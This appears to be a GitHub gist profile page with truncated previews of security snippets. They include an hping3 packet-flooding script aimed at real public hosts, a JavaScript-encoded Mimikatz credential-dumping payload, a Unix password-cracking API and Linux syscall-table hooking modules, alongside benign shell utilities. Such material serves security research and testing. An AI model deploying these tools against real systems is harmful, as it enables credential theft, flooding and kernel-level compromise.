Skip to content

Instantly share code, notes, and snippets.

View shekkbuilder's full-sized avatar

shekk shekkbuilder

View GitHub Profile
@shekkbuilder
shekkbuilder / Hping3 Packet Grenade
Created May 12, 2017 17:22 — forked from Erreinion/Hping3 Packet Grenade
Firewall testing script using hping3
# Packet Grenade
# Feb 13, 2015
# Lists of targets
set pinglist [list www.google.com www.facebook.com]
set httplist [list www.google.com www.facebook.com]
set httpslist [list www.google.com www.facebook.com]
set ftplist [list]
set sshlist [list alt.org thebes.openshells.net]
@shekkbuilder
shekkbuilder / fifo_logwatch.sh
Created May 6, 2017 17:05 — forked from jrelo/fifo_logwatch.sh
watch a log with tail -f and a fifo to run command when a grep match is made
#!/bin/bash
#fifo_logwatch.sh -jrelo
trap ctrl_c INT
fifo=/tmp/fifolog.$$
mkfifo "${fifo}" || exit 1
function ctrl_c() {
echo "ctrl^c caught. exiting..."
rm "${fifo}"
exit 130;
@shekkbuilder
shekkbuilder / katz.js
Created April 29, 2017 02:31
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
@shekkbuilder
shekkbuilder / katz.js
Created April 29, 2017 02:31
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
@shekkbuilder
shekkbuilder / basic_socket_usage.rb
Created April 26, 2017 06:23 — forked from picatz/basic_socket_usage.rb
Violent Ruby: Banner Grabber - Basic Socket Usage
# coding: utf-8
# Basic socket usage to grab a banner.
# @author Kent 'picat' Gruber
require 'socket'
# Grab the banner of a given +ip+ address and +port+
# to attempt to connect to.
#
# @param ip [String] Target IP address.
@shekkbuilder
shekkbuilder / streaming_unix_password_cracking_api.rb
Created April 26, 2017 06:22 — forked from picatz/streaming_unix_password_cracking_api.rb
Violent Ruby: Streaming REST API Unix Password Cracker
require 'json'
require 'sinatra'
require 'violent_ruby'
post '/crack_passwords' do
content_type :json
config = {
file: params['file'][:tempfile],
dictionary: params['dictionary'][:tempfile]
}
@shekkbuilder
shekkbuilder / SystemCallHooking.c
Created April 26, 2017 01:58 — forked from mike820324/SystemCallHooking.c
An example of Hooking Linux System Call
#include <linux/module.h>
#include <linux/printk.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#include <asm/pgtable_types.h>
#include <linux/highmem.h>
#include "hook_function_ptr.h"
@shekkbuilder
shekkbuilder / Makefile
Created April 26, 2017 01:51 — forked from ilammy/Makefile
Linux kernel system call table hooking
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
@shekkbuilder
shekkbuilder / hex2dec.sh
Last active April 22, 2017 05:58 — forked from jrelo/hex2dec.sh
hex to decimal command line conversion methods.
quick:
$ echo $((0x15a))
346
$ printf '%d\n' 0x15a
346
$ perl -e 'printf ("%d\n", 0x15a)'
346
@shekkbuilder
shekkbuilder / modprobel.sh
Created April 20, 2017 00:17 — forked from jrelo/modprobel.sh
modprobe -l replacement
#!/bin/bash
#kmods and stuff
#grep -o '[^\/]*$' /lib/modules/$(uname -r)/modules.builtin > /tmp/mods.builtin ; find /lib/modules/$(uname -r)/kernel -type f -printf '%f\n'|grep -v -f /tmp/mods.builtin|cut -d\. -f1|while read; do modinfo $REPLY;done
#grep -H '' /sys/module/*/parameters/*
for i in `find /sys/ -name modalias -exec cat {} \;`; do
/sbin/modprobe --config /dev/null --show-depends $i ;
done | rev | cut -f 1 -d '/' | rev | sort -u
find /lib/modules/$(uname -r)/kernel -type f -printf '%f\n' | sort | while read mod;do [ $(lsmod | grep -c ${mod/.ko/}) -ge 1 ] && echo "$mod (loaded)" || echo "$mod";done | tee /tmp/modules.out